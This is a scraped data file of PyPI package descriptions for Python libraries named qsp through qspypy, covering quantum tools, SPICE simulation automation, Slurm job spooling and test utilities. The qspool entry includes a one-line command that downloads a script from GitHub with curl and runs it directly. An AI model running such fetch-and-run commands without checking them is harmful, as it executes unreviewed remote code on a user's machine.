git+https://github.com/mohsin-0/qsp.git@mainTutorialUsage tutorialand somebenchmarksBasic Examplefromqsp.tspimportMPSPreparationimportnumpyasnpbond_dim,phys_dim=4,2L=10tensor_array=[np.random.rand(bond_dim,bond_dim,phys_dim)for_inrange(L)]tensor_array[0]=np.random.rand(bond_dim,phys_dim)# end points of mpstensor_array[-1]=np.random.rand(bond_dim,phys_dim)prep=MPSPreparation(tensor_array,shape='lrp')overlap,circ=prep.sequential_unitary_circuit(num_seq_layers=4)ReferencesEncoding of matrix product states into quantum circuits of one-and two-qubit gates,Shi-Ju Ran, Phys. Rev. A 101, 032310 (2020)Variational power of quantum circuit tensor networks,Reza Haghshenas, Johnnie Gray, Andrew C Potter, and Garnet Kin-Lic Chan, Phys. Rev. X 12, 011047 (2022)Preentangling Quantum Algorithms--the Density Matrix Renormalization Group-assisted Quantum Canonical Transformation,Mohsin Iqbal, David Munoz Ramo and Henrik Dreyer, arXiv preprint arXiv:2209.07106 (2022)Efficient adiabatic preparation of tensor network states,Zhi-Yuan Wei, Daniel Malz and Ignacio J. Cirac, Phys. Rev. 
Research 5, L022037 (2023)"} +{"package": "qs-params", "pacakge-description": "UNKNOWN"} +{"package": "qsparse", "pacakge-description": "QSPARSEQSPARSE provides the open source implementation of the quantization and pruning methods proposed inLearning Low-Precision Structured Subnetworks Using Joint Layerwise Channel Pruning and Uniform Quantization. This library was developed to support and demonstrate strong performance and flexibility among various experiments.Full PrecisionJoint Quantization4bitand Channel Pruning75%importtorch.nnasnnnet=nn.Sequential(nn.Conv2d(3,32,5),nn.ReLU(),nn.ConvTranspose2d(32,3,5,stride=2))importtorch.nnasnnfromqsparseimportprune,quantize,convertnet=nn.Sequential(quantize(nn.Conv2d(3,32,5),bits=4),nn.ReLU(),prune(sparsity=0.75,dimensions={1}),quantize(bits=8),quantize(nn.ConvTranspose2d(32,3,5,stride=2),bits=4))# Automatic conversion is available via `convert`.# Please refer to documentation for more details.InstallationQSPARSE can be installed fromPyPI:pipinstallqsparseUsageDocumentation can be accessed fromRead the Docs.Examples of applying QSPARSE to different tasks are provided atexamplesandmdpi2022.CitingIf you find this open source release useful, please reference in your paper:Zhang, X.; Colbert, I.; Das, S. Learning Low-Precision Structured Subnetworks Using Joint Layerwise Channel Pruning and Uniform Quantization. Appl. Sci. 2022, 12, 7829.https://doi.org/10.3390/app12157829@Article{app12157829,AUTHOR={Zhang, Xinyu and Colbert, Ian and Das, Srinjoy},TITLE={Learning Low-Precision Structured Subnetworks Using Joint Layerwise Channel Pruning and Uniform Quantization},JOURNAL={Applied Sciences},VOLUME={12},YEAR={2022},NUMBER={15},ARTICLE-NUMBER={7829},URL={https://www.mdpi.com/2076-3417/12/15/7829},ISSN={2076-3417}}"} +{"package": "qsparser", "pacakge-description": "qsparserQuery string parser with nested structure supported.UsageStringifyfromqsparserimportstringify# simple objectstringify({'a':'5','b':'c'})# a=5&b=c# nested objectstringify({'a':{'b':'c'},'d':{'e':'f'}})# a[b]=c&d[e]=fParsefromqsparserimportparse# simple stringparse('a=5&b=c')# {'a': '5', 'b': 'c'}# multiple stringparse('a[b]=c&d[e]=f')# {'a': {'b': 'c'},'d': {'e': 'f'}}InstallationpipinstallqsparserChangelog1.1.0Rigid rules on string with null representing content.Use private function names.Authorqsparseris authored by Victor Teo and Chun Tse.LicenseMIT LicenseCopyright (c) 2021 Fillmula Inc.Permission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qs-parse-rest", "pacakge-description": "No description available on PyPI."} +{"package": "qspd", "pacakge-description": "This package implements Jeongwan Haah's algorithm for quantum signal processing as described in thispaper. It includes a step by step\nalgorithm that decomposes periodic functions (often from quantum signal processing) into a product of primitive matrices,\nrepresented as a list of angles. The algorithmic complexity is O(N3polylog(N/\ud835\udf3a)) where N is the degree of the\nperiodic function and \ud835\udf3a is the precision parameter. The runtime bottleneck is a polynomial rootfinding in step 2. Haah\nconcludes that the error is at most the error input (=15\ud835\udf3a).\nDISCLAIMER: This is in initial investigation stages, and the usage is subject to change."} +{"package": "qspec", "pacakge-description": "qspecA python package for calculations surrounding laser spectroscopy.TheqspecPython package provides mathematical and physical functions\nfrequently used in laser spectroscopy but also more general methods for data processing.\nMost functions are compatible with numpy arrays and are able to process n-dimensional arrays,\neven in the case of arrays of vector- or matrix-objects. This enables fast calculations with large samples of data,\ne.g., facilitating Monte-Carlo simulations.Exemplary, two exciting use cases could be:Coherently evolve atomic state population in a classical laser field.\nIn contrast to powerful packages such asqutip,\nthe quantum mechanical system is set up automatically by just providing atomic state and laser information.Generate modular lineshape models for fitting. The modular system can be used\nto sum, convolve, link models and share parameters, fit hyperfine structure spectra, etc.Included modulestools: General helper, print, data shaping and mathematical functions.stats: Contains functions for the statistical analysis of data.physics: Library of physical functions.algebra: Contains functions to calculate dipole coefficients and Wigner-j symbols.analyze: Contains optimization functions and a class for King-plots.lineshapes: A framework to generate modular lineshape models for fitting.simulate: An intuitive framework to simulate laser-atom interactions."} +{"package": "qspice", "pacakge-description": "PyQSPICEQSPICE is a toolchain of python utilities design to interact specifically with QSPICE.What is contained in this repositoryraw_read.pyA pure python class that serves to read raw files into a python class.spice_editor.py and qsch_editor.pyScripts that can update spice netlists. The following methods are available to manipulate the component values,\nparameters as well as the simulation commands. These methods allow to update a netlist without having to open the\nschematic in Qspice. 
The simulations can then be run in batch mode (see sim_runner.py).set_element_model('D1', '1N4148') # Replaces the Diode D1 with the model 1N4148set_component_value('R2', '33k') # Replaces the value of R2 by 33kset_parameters(run=1, TEMP=80) # Creates or updates the netlist to have .PARAM run=1 or .PARAM TEMP=80add_instructions(\".STEP run -1 1023 1\", \".dc V1 -5 5\")remove_instruction(\".STEP run -1 1023 1\") # Removes previously added instructionreset_netlist() # Resets all edits done to the netlist.sim_runner.pyA python script that can be used to run Qspice simulations in batch mode without having to open the Qspice GUI.\nThis in cooperation with the classes defined in spice_editor.py or qsch_editor.py is useful because:Can overcome the limitation of only stepping 3 parametersDifferent types of simulations .TRAN .AC .NOISE can be run in a single batchThe RAW Files are smaller and easier to treatWhen used with the RawRead.py and LTSteps.py, validation of the circuit can be done automatically.Different models can be simulated in a single batch, by using the following instructions:Note: It was only tested with Windows based installations.It is based on the spicelib library and therefore most documentation can be found there.The major difference is that in this library all defaults point to the QSpice and the tools that are not pertaining to QSPICE are not mappedHow to Installpip install qspiceUpdating qspicepip install --upgrade qspiceRequirementsspicelibHow to useHere follows a quick outlook on how to use each of the tools.More comprehensive documentation can be found in https://spicelib.readthedocs.io/en/latest/. This is the base package on which this library is based, however, not all functionalities\nare ported to this package.LICENSEGNU V3 License\n(refer to the LICENSE file)RawReadThe example below reads the data from a Spice Simulation called\n\"TRAN - STEP.raw\" and displays all steps of the \"I(R1)\" trace in a matplotlib plotfromqspiceimportRawReadfrommatplotlibimportpyplotaspltrawfile=RawRead(\"TRAN - STEP.raw\")print(rawfile.get_trace_names())print(rawfile.get_raw_property())IR1=rawfile.get_trace(\"I(R1)\")x=rawfile.get_trace('time')# Gets the time axissteps=rawfile.get_steps()forstepinrange(len(steps)):# print(steps[step])plt.plot(x.get_wave(step),IR1.get_wave(step),label=steps[step])plt.legend()# order a legendplt.show()SpiceEditor, QschEditor and SimRunner.pyThis module is used to launch Qspice simulations. 
Results then can be processed with either the RawRead or with the\nQspiceLogReader module to obtain .MEAS results.The script will firstly invoke the Qspice in command line to generate a netlist, and then this netlist can be updated\ndirectly by the script, in order to change component values, parameters or simulation commands.Here follows an example of operation.fromqspiceimportSimRunner,SpiceEditor,RawRead,sweep_logdefprocessing_data(raw_file,log_file):print(\"Handling the simulation data of%s, log file%s\"%(raw_file,log_file))raw_data=RawRead(raw_file)vout=raw_data.get_wave('V(out)')returnraw_file,vout.max()# select spice modelsim=SimRunner(output_folder='./temp')netlist=SpiceEditor('./testfiles/testfile.net')# set default argumentsnetlist.set_component_value('R1','4k')netlist.set_element_model('V1',\"SINE(0 1 3k 0 0 0)\")# Modifying thenetlist.add_instruction(\".tran 1n 3m\")netlist.add_instruction(\".plot V(out)\")netlist.add_instruction(\".save all\")sim_no=1# .step dec param cap 1p 10u 1forcapinsweep_log(1e-12,10e-6,10):netlist.set_component_value('C1',cap)sim.run(netlist,callback=processing_data,run_filename=f'testfile_qspice_{sim_no}.net')sim_no+=1# Reading the dataresults={}forraw_file,vout_maxinsim:# Iterate over the results of the callback functionresults[raw_file.name]=vout_max# The block above can be replaced by the following line# results = {raw_file.name: vout_max for raw_file, vout_max in sim}print(results)# Sim Statisticsprint('Successful/Total Simulations: '+str(sim.okSim)+'/'+str(sim.runno))input('Press Enter to delete simulation files...')sim.file_cleanup()The example above is using the SpiceEditor to create and modify a spice netlist, but it is also possible to use the\nQschEditor to directly modify the .qsch file. The edited .qsch file can then be opened by the Qspice GUI and the\nsimulation can be run from there.QschEditorThis module is used to create and modify Qspice schematics. The following methods are available to manipulate the\ncomponent values, parameters as well as the simulation commands. These methods allow to update a schematic without\nhaving to open the Qspice GUI. 
The simulations can then be run in batch mode (see sim_runner.py).The following example shows how to read a Qspice schematic, get the information about the components, change the value\nof a resistor, change the value of a parameter, add a simulation instruction and write the netlist to a file.fromqspiceimportQschEditoraudio_amp=QschEditor(\"./testfiles/AudioAmp.qsch\")print(\"All Components\",audio_amp.get_components())print(\"Capacitors\",audio_amp.get_components('C'))print(\"R1 info:\",audio_amp.get_component_info('R1'))print(\"R2 value:\",audio_amp.get_component_value('R2'))audio_amp.set_parameter('run',1)print(audio_amp.get_parameter('run'))audio_amp.set_parameter('run',-1)print(audio_amp.get_parameter('run'))audio_amp.add_instruction('.tran 0 5m')audio_amp.save_as(\"./testfiles/AudioAmp_rewritten.qsch\")audio_amp.save_netlist(\"./testfiles/AudioAmp_rewritten.net\")Simulation Analysis ToolkitAll the Analysis Toolkit classes are located in the spicelib.sim.toolkit package.\nThe following classes are available:SensitivityAnalysisMontecarloWorstCaseAnalysisPlease refer to the spicelib documentation for more information.fromqspiceimportSimRunner,QschEditor# Imports the class that manipulates the qsch filefromspicelib.sim.tookit.montecarloimportMontecarlo# Imports the Montecarlo toolkit classsallenkey=QschEditor(\"./testfiles/AudioAmp.qsch\")# Reads the qsch file into memoryrunner=SimRunner(output_folder='./temp_mc')# Instantiates the runner with a temp folder setmc=Montecarlo(sallenkey,runner)# Instantiates the Montecarlo class, with the qsch file already in memory# The following lines set the default tolerances for the componentsmc.set_tolerance('R',0.01)# 1% tolerance, default distribution is uniformmc.set_tolerance('C',0.1,distribution='uniform')# 10% tolerance, explicit uniform distributionmc.set_tolerance('V',0,distribution='normal')# 10% tolerance, but using a normal distribution# Some components can have a different tolerancemc.set_tolerance('R1',0.05)# 5% tolerance for R1 only. This only overrides the default tolerance for R1mc.add_instruction('.func mc(x, tol) {x * (1 + tol * 2 * (random() - 0.5))}')# Creates the missing mc() function# Tolerances can be set for parameters as well# mc.set_parameter_deviation('Vos', 3e-4, 5e-3, 'uniform') # The keyword 'distribution' is optionalmc.prepare_testbench(num_runs=1000)# Prepares the testbench for 1000 simulationsmc.editor.save_as('./testfiles/AudioAmp_mc.qsch')# Saves the modified qsch file# Finally the netlist is saved to a filemc.save_netlist('./testfiles/AudioAmp_mc.net')# TODO: Implement the conversion to spice filemc.run(max_runs_per_sim=100)# Runs the simulation with splits of 100 runs eachlogs=mc.read_logfiles()# Reads the log files and stores the results in the results attributelogs.export_data('./temp_mc/data.csv')# Exports the data to a csv filelogs.plot_histogram('fcut')# Plots the histograms for the resultsmc.cleanup_files()# Deletes the temporary filesThe following updates were made to the circuit:The value of each component was replaced by a function that generates a random value within the specified tolerance.The .step param run command was added to the netlist. Starts at -1 which it's the nominal value simulation, and\nfinishes that the number of simulations specified in the prepare_testbench() method.A default value for the run parameter was added. This is useful if the .step param run is commented out.The R1 tolerance is different from the other resistors. 
This is because the tolerance was explicitly set for R1.The Vos parameter was added to the .param list. This is because the parameter was explicitly set using the\nset_parameter_deviation method.Functions utol, ntol and urng were added to the .func list. These functions are used to generate random values.\nUniform distributions use the mc() function that is inspired on the approach for monte-carlo used in LTspice.Similarly, the worst case analysis can also be setup by using the class WorstCaseAnalysis. Refer to spicelib for more\ninformation.QspiceLogReaderThis module defines a class that can be used to parse Qspice log files where the information about .STEP information is\nwritten. There are two possible usages of this module, either programmatically by importing the module and then\naccessing data through the class as exemplified here:fromqspiceimportQspiceLogReaderdata=QspiceLogReader(\"Batch_Test_AD820_15.log\")print(\"Number of steps :\",data.step_count)step_names=data.get_step_vars()meas_names=data.get_measure_names()# Printing Headersprint(' '.join([f\"{step:15s}\"forstepinstep_names]),end='')# Print steps names with no new lineprint(' '.join([f\"{name:15s}\"fornameinmeas_names]),end='\\n')# Printing dataforiinrange(data.step_count):print(' '.join([f\"{data[step][i]:15}\"forstepinstep_names]),end='')# Print steps names with no new lineprint(' '.join([f\"{data[name][i]:15}\"fornameinmeas_names]),end='\\n')# Print Headerprint(\"Total number of measures found :\",data.measure_count)Other features (Toolkit, logging, etc..)Refer to the spicelib documentation for more information.To whom do I talk to?Tools website :https://www.nunobrum.com/pyltspice.htmlRepo owner :me@nunobrum.comAlternative contact :nuno.brum@gmail.comHistoryVersion 0.5.0Fixes on the montecarlo example.Aligning with spicelib 1.0.1Version 0.4SimAnalysis supporting both Qspice and LTSpice logfiles.FastWorstCaseAnalysis algorithm implementedFix on the log reading of fourier data.Version 0.3Alignment with spicelib 0.8Important Bugfix on the LTComplex class.Fixes and enhancing the analysis toolkit.Version 0.2First operating versionVersion 0.1Reserving library name"} +{"package": "qspider", "pacakge-description": "QSpiderAn easy to use tools module for writing multi-thread and multi-process programs.InstallQSpider could be easily installed using pip:$pipinstallqspiderExampleimportrequestsfromqspiderimportconcurrent# Define a source list for task function to parse.defget_source():\"\"\"Return a url list.\"\"\"return['http://www.baidu.com'foriinrange(500)]# Define the task function and add a thread_func decorator# The thread_func decorator needs a source list, and other options (num_workers, has_result ...) 
as arguments@concurrent.thread_func(source=get_source(),num_workers=100,has_result=True)defmy_task(task_source):\"\"\"A customized task function.Process the task_source and return the processed results.Arguments:param task_source: the elem in the source list, which is a url here.:rtype: (int) A http status code.\"\"\"url=task_sourceres=requests.get(url,timeout=5)returnres.status_code# Execute the task function.results=my_task()print(results)Results of the example is as below:[Info]500tasksintotal.[\u2714]100%\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501500/500[eta-0:00:00,0.9s,542.9it/s][200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,...,200,200,200,200]Releasesv0.1.1: First release with basic classes.v0.1.2: Reconstruct code, add ThreadManager, ProcessManager and other tool classes.v0.1.3: Fix multiprocess locking bug on Windows.v0.1.4:Add silent argument in manager._run method.Enhance the display style of the progress message.v0.1.5:Make task be either a class, a function or a class method.Add concurrent decorators for convenient use.Add concurrent decorator examples.v0.1.6:Update templates.Replace multiprocessing queue.Support with statement.Optimize displays in jupyter notebook and windows powershell.LicenseCopyright (c) 2020 tishacy.Licensed under theMIT License."} +{"package": "qspin", "pacakge-description": "This is a little package that will help with learning how quantum spin and entanglement work.\nIt is meant to complement some of the \u201ctheoretical minimum\u201d lectures and other web resources:[Quantum state;Pauli matrices;Singlet state;Triplet state;Density matrix;Quantum entanglement;Entropy;Quantum logic gate]Book:Quantum Mechanics - The Theoretical Minimum, Leanoard Susskind and Art Friedman, Basic Books, 2014. (mostly chapters 6&7)http://theoreticalminimum.com/courses/quantum-mechanics/2012/winter/lecture-6and lecture-7Link to documentation on readthedocsInstallpipinstall--upgradeqspinOut-of-the box tests:$python>>>importqspin>>>qspin.all_tests()Examples of code useSpin statesup, down and linear combinations to form mixed states>>>fromqspinimportbra,ket,u,d,s0,sx,sy,sz>>>u|u>>>>d|d>>>>u+d|u>+|d>>>>i=1j>>>u+i*d|u>+i|d>Operators>>>sx# Pauli spin matrix[[01][10]]>>>sy[[0.+0.j-0.-1.j][0.+1.j0.+0.j]]>>>sz[[10][0-1]]>>>sz*u|u>>>>sz*d-|d>Expected value of an observablesz is the observable for z-component of spin, For the \u201cup\u201d state, the only\noutcome us +1, so the expected value is +1.>>u.H*sz*u1.0>>sz.average(u)# another way to compute the average of an observable1.0(q.His Hermetian conjugate; it converts a ket to a bra, as in\\(\\Braket{u|s_z|u}\\)).\nThe operator (sz in this case) is known in quantum mechanics as an observable,\nmeaning it measures something. Here it is the z-component of spin.\nThe eigenvalues of the observable are the possible outcomes the observation.\nUnderlying each state is a wave function. We store the wave function internally\nas vector, with each component being the wave function value for the basis eigenstate.\nThe operators (observables) are stored as matrices, also defined on the same basis.\nThe assumed basis throughout qspin is\\(\\Ket{u}\\)and\\(\\Ket{d}\\)for single particles.>>>u|u>>>>u.phimatrix([[1.],[0.]])EigenvaluesWe can evaluate the eigenvalues and eigenvectors of observables. 
\u201c.matrix\u201d pulls out the matrix\nrepresentation of the operator.>>>importnumpyasnp>>>sz[[10][0-1]]>>>ev,evec=np.linalg.eig(sz.matrix)>>>evarray([1.,-1.])>>>evecmatrix([[1.,0.],[0.,1.]])>>>sx# spin x[[01][10]]>>>ev,evec=np.linalg.eig(sx.matrix)>>>evarray([1.,-1.])>>>evecmatrix([[0.70710678,-0.70710678],[0.70710678,0.70710678]])There is a handy \u2018eig\u2019 method that produces a list of eigenvalues and a\nlist of eigenvectors, with the eigenvectors being states:>>>ev,evec=sx.eig()>>>evarray([1.,-1.])>>>evec[0.707107|u>+0.707107|d>,-0.707107|u>+0.707107|d>]>>>sz.eig()(array([1.,-1.]),[|u>,|d>])Note that the spin-x observable has the same eigenvalues as spin-z, +1 and -1. But the eigenvectors\nare different, in our basis, since we are using the {\\(\\Ket{u}\\),\\(\\Ket{d}\\)} basis. They are \\((\\Ket{u} + \\Ket{d})/\\sqrt{2}\\), which measures as sx = +1, and \\((\\Ket{u} - \\Ket{d})/\\sqrt{2}\\), which measures as sx = -1.Conditional ProbabilitiesConditional probabilities are calculated using inner products of states with the\neigenvectors of the measurement, squared. So the probability\nof measuring sx = +1 given the particle is prepared in state \\(\\Ket{u}\\) is:>>>l=(u+d).N# \"left\" state. The .N normalizes the state>>>(bra(l)*ket(u))**2# expected value of up given left0.5>>>np.abs(l.H*u)**2# another way to do this. The .H means Hermitian conjugate; converts ket to bra0.5>>>l.prob(sx,l)1.0>>>l.prob(sx,u)0.5MeasurementThe quantum measurement of an observable involves \u2018collapsing\u2019 the state\nto one of the eigen states of the observable.>>>l=(u+d).N>>>sz.measure(l)(1.0,|u>)The result is random, either up or down\n(with 50-50 probability in this case where the particle starts out in state \u2018spin left\u2019).\nThe measure function returns the value of the measurement, 1.0 in this case,\nand the collapsed state, \\(\\Ket{u}\\).String Representation of StateWe can use strings to refer to basis states.>>>u=ket('|u>')# or ket('u') (the vert line and bracket are optional)>>>d=ket('|d>')# or ket('d')>>>u|u>>>>d|d>The string representation of basis functions defaults to \u2018u\u2019 and \u2018d\u2019. As\nan alternative, the representation can be set to\n\u20180\u2019 and \u20181\u2019 or to up and down arrows (the latter require your\nterminal to have the ability to display unicode characters).>>>qspin.set_base_repr('01')>>>u=ket('0')>>>d=ket('1')>>>(u+d).N0.707107|0>+0.707107|1>With qspin.set_base_repr('arrow'), u=ket([1,0]) renders as \\(\\Ket{\\uparrow}\\). This provides cute printout, but is not too useful for string entry, since the up and\ndown arrows are unicode.Wave Function DefinitionStates can also be defined using the wave function, given\nin the form of a matrix column vector. 
And it is good practice\nto normalize states.>>>w=ket(np.matrix([1.,1.]).T).N>>>w0.707106781187|u>+0.707106781187|d>Form a projection operator from outer products of basis states.>>rho=ket('|u>')*bra('<u|')+ket('|d>')*bra('<d|')# can also do this:>>u=ket('|u>');d=ket('|d>');>>rho=ket(u)*bra(u)+ket(d)*bra(d)>>>rho[[1.0.][0.1.]]>>>u1.0|u>>>>rho*u1.0|u>>>>rho*d1.0|d>Note that bra(ket(\u2026)) and ket(bra(\u2026)) convert, and take care of the complex-conjugating.>>u.kind'ket'>>bra(u).kind'bra'Density Matrix and EntropyCreate a density matrix for an ensemble of single particles.>>fromqspinimportentropy>>P=[0.5,0.5]>>rho=P[0]*bra('|u>').density()+P[1]*bra('|d>').density()# make sure the probabilities add to one>>entropy(rho)# it's not zero because there is a mixture of states0.69314718055994529>>rho=(bra('|u>')+bra('|d>')).N.density()>>entropy(rho)# this is zero because all electrons are prepared in the \"u+d\" state0Make sure you normalize any states you define, using the post-operation .N.The von Neumann entropy is \\(S = -\\sum_i(p_i log(p_i))\\) where \\(p_i\\) are the density matrix eigenvalues.\nThe entropy is essentially the randomness in a measurement of the quantum state. It\ncan be applied to any density matrix for either pure or mixed states. (A\npure state has zero entropy.)Multi-particle StatesMulti-particle states are in the space formed from the Kronecker product of Hilbert spaces\nof the individual particles. Since multi-particle quantum states can be mixed states, there\nare far more possible state vectors (\\(2^n\\) dimensional vector space) than for classical\nsystems (which are in only \\(n\\) dimensional space). We build up multi-particle states with Kronecker products \u2018**\u2019 (meaning \\(\\otimes\\)), or with strings>>>uu=u**u>>>dd=ket('|dd>')# or ket('dd')>>>s=(d**u**u+u**d**u+d**d**u).N>>>s0.57735|udu>+0.57735|duu>+0.57735|ddu>Multi-particle operators are similarly built up with Kronecker products>>>s2x=sx**sx>>>s2x[[0001][0010][0100][1000]]Partial TraceThe density matrix for a multi-particle state is \\(2^n \\times 2^n\\). A partial\ntrace is a way to form the density matrix for a subset of the particles. 
\u2018Tracing out\u2019\\(m\\)of the particles results in a\\(2^{n-m} \\times 2^{n-m}\\)density matrix.\nPartial traces are important in many aspects of analyzing the multi-particle state,\nincluding evaluating the entanglement.>>>sing=(u**d-d**u).N>>>rho=sing.density()>>>rhomatrix([[0.,0.,0.,0.],[0.,0.5,-0.5,0.],[0.,-0.5,0.5,0.],[0.,0.,0.,0.]])>>>rhoA=ptrace(rho,[1])# trace over particle 1 ('Bob') to get particle 0 ('Alice') density>>>rhoAmatrix([[0.5,0.],[0.,0.5]])Entangled StatesOnce you have created a (possibly) entangled state of two particles, you can test it for entanglement:>>>sing=(u**d-d**u).N>>>sing.entangled()True>>>(u**u).entangled()FalseThe test for entanglement is to check the entropy of one of the particles after\nthe other particle has been \u2018traced out.\u2019Quantum ComputingSeveral quantum logic gates are now defined in qspin including:\nHadamard, NOT, SWAP, controlled gates, square root gates, and phase shift gates.>>>fromqspinimportu,d,gate>>>SWAP=gate('SWAP')>>>SWAP*(u**d)|du>>>>H=gate('Hadamard')>>>H*u0.707|u>+0.707|d>>>>H*d0.707|u>-0.707|d>shows that SWAP interchanges the q-bits, and Hadamard makes the Bell states\nfrom spin up and spin down."} +{"package": "qspool", "pacakge-description": "UsageYou need to submit more slurm scripts than fit on the queue at once.tree.\n.\n\u251c\u2500\u2500slurmscript0.slurm.sh\n\u251c\u2500\u2500slurmscript1.slurm.sh\n\u251c\u2500\u2500slurmscript2.slurm.sh\n\u251c\u2500\u2500slurmscript3.slurm.sh\n\u251c\u2500\u2500slurmscript4.slurm.sh\n\u251c\u2500\u2500slurmscript5.slurm.sh\n\u251c\u2500\u2500slurmscript6.slurm.sh\n\u251c\u2500\u2500slurmscript7.slurm.sh\n\u251c\u2500\u2500slurmscript8.slurm.sh\n...Theqspoolscript will feed your job scripts onto the queue as space becomes available.python3-mqspool*.slurm.shYou can also provide job names via stdin, which is useful for very large job batches.find.-maxdepth1-name'*.slurm.sh'|python3-mqspoolTheqspoolscript creates a slurm job that submits your job scripts.\nWhen queue capacity fills, thisqspooljob will schedule a follow-up job to submit any remaining job scripts.\nThis process continues until all job scripts have been submitted.usage: qspool.py [-h] [--payload-job-script-paths-infile PAYLOAD_JOB_SCRIPT_PATHS_INFILE] [--job-log-path JOB_LOG_PATH] [--job-script-cc-path JOB_SCRIPT_CC_PATH]\n [--queue-capacity QUEUE_CAPACITY] [--qspooler-job-title QSPOOLER_JOB_TITLE]\n [payload_job_script_paths ...]\n\npositional arguments:\n payload_job_script_paths\n What scripts to spool onto slurm queue? (default: None)\n\noptions:\n -h, --help show this help message and exit\n --payload-job-script-paths-infile PAYLOAD_JOB_SCRIPT_PATHS_INFILE\n Where to read script paths to spool onto slurm queue? (default: <_io.TextIOWrapper name='' mode='r' encoding='utf-8'>)\n --job-log-path JOB_LOG_PATH\n Where should logs for qspool jobs be written? (default: ~/slurm_job_log/)\n --job-script-cc-path JOB_SCRIPT_CC_PATH\n Where should copies of submitted job scripts be kept? (default: ~/slurm_job_script_cc/)\n --queue-capacity QUEUE_CAPACITY\n How many jobs can be running or waiting at once? (default: 1000)\n --qspooler-job-title QSPOOLER_JOB_TITLE\n What title should be included in qspooler job names? 
(default: none)Installationno installation:python3\"$(tmpfile=\"$(mktemp)\";curl-shttps://raw.githubusercontent.com/mmore500/qspool/v0.4.2/qspool.py>\"${tmpfile}\";echo\"${tmpfile}\")\"[ARGS]pip installation:python3-mpipinstallqspool\npython3-mqspool[ARGS]qspoolhas zero dependencies, so no setup or maintenance is required to use it.\nCompatible all the way back to Python 3.6, so it will work on your cluster's ancient Python install.How it Worksqspool\n * read contents of target slurm scripts\n * instantiate qspooler job script w/ target slurm scripts embedded\n * submit qspooler job script to slurm queue\u2b07\ufe0f \u2b07\ufe0f \u2b07\ufe0fqspooler job 1\n * submit embedded target slurm scripts one by one until queue is almost full\n * instantiate qspooler job script w/ remaining target slurm scripts embedded\n * submit qspooler job script to slurm queue\u2b07\ufe0f \u2b07\ufe0f \u2b07\ufe0fqspooler job 2\n * submit embedded target slurm scripts one by one until queue is almost full\n * instantiate qspooler job script w/ remaining target slurm scripts embedded\n * submit qspooler job script to slurm queue...qspooler job n\n * submit embedded target slurm scripts one by one\n * no embedded target slurm scripts remain\n * exitRelated Softwareroll_quses a similar approach to solve this problem.roll_qdiffers in implementation strategy.roll_qtracks submission progress via an index variable in a file associated with a job batch.qspoolembeds jobs in the submission worker script itself."} +{"package": "qspy", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qspypy", "pacakge-description": "The qspypy packageTheqspypypackage is a rewrite of the existing Tcl qspy and qutest scripts\nusing Python 3.6.This package currently contains two main modules:qspyandqutest.At some point in the future, theqspyviewfront end may be added as well.Since Python comes with Tk, the translation effort shouldn't be too great.The qspy moduleThe qspy module is the interface to the qspy back end application that ultimately\ninterfaces with the target. This module provides a series of message send and\ncallback methods so that knowledge of communications is hidden from qutest.The qutest moduleThe qutest module is designed to be run using the powerfulpytestPython testing framework.Pytest makes it easy to discover and run your qutest scripts,\nin addition to a host of other features like jUnit XML output for Jenkins\nand hundreds of other plugins.Finally, qutest provides the added feature of automatically starting qspy\nfor you (assuming it's on your path) at the start of every test session. This\nbehavior and other options can be customized via the standardconftest.pypytest configuration script.InstallationInstallation is through pip:pip3 install qspypyTcl Script ConversionAs of qspypy 1.1.0, a new system wide command line utility is provided calledqutest_convert.This script can domostof the conversion of a test script\nfrom Tcl to Python for you (e.g. it doesn't convert Tcl binary format to Python\nstruck.pack).Simply provide the list of Tcl test files to convert, for example:qutest_convert test_table.tcl test_philo.tclIn additon, this utility will create a defaultconftest.py.Test Creation and Test FixturesIf you understand how the existing Tcl based qutest scripts are written,\nit should not be too difficult for you to understand the qutest/pytest versions.Each pytest test function can derive from one or more test fixtures. 
These\ntest fixtures (defined in the qspypy.fixtures module) provide a context fortests and execute before (and optionally after with ayield) each test.Fixtures replace the standard xUnit setUp and tearDown methods.Qspypy provides two basic test fixtures for you to use for your tests:qutestandqutest_noreset.Qutest and qutest_norest both provide the same per-test context,\nbut qutest_noreset does not reset the target. Both of these contexts contain\nthe qutest_context methods that are identical (except for Coninue) to the\nqutest.tcl procedure names.In addition to these, you can provide your own common test fixture, either inconftest.pyfor global access or in each individual script.Example from qpcpp version 6.3.2Here is a part of the dpptest_philo.pytest script.The full example of this and thetest_table.pyis available onGitHub.import sys\nimport pytest\nimport struct\nfrom qspypy.qspy import FILTER, QS_OBJ_KIND\n\n\ndef on_reset(qutest):\n \"\"\" Common reset handler called by qutest after resetting target \"\"\"\n\n qutest.expect_pause()\n qutest.glb_filter(FILTER.SM)\n qutest.loc_filter(QS_OBJ_KIND.SM_AO, 'AO_Philo<2>')\n qutest.Continue() # note continue in lower case. is a reserved word in python\n qutest.expect(\"===RTC===> St-Init Obj=AO_Philo<2>,State=QP::QHsm::top->thinking\")\n qutest.expect(\"===RTC===> St-Entry Obj=AO_Philo<2>,State=thinking\")\n qutest.expect(\"%timestamp Init===> Obj=AO_Philo<2>,State=thinking\")\n qutest.glb_filter(FILTER.SM, FILTER.AO, FILTER.UA)\n 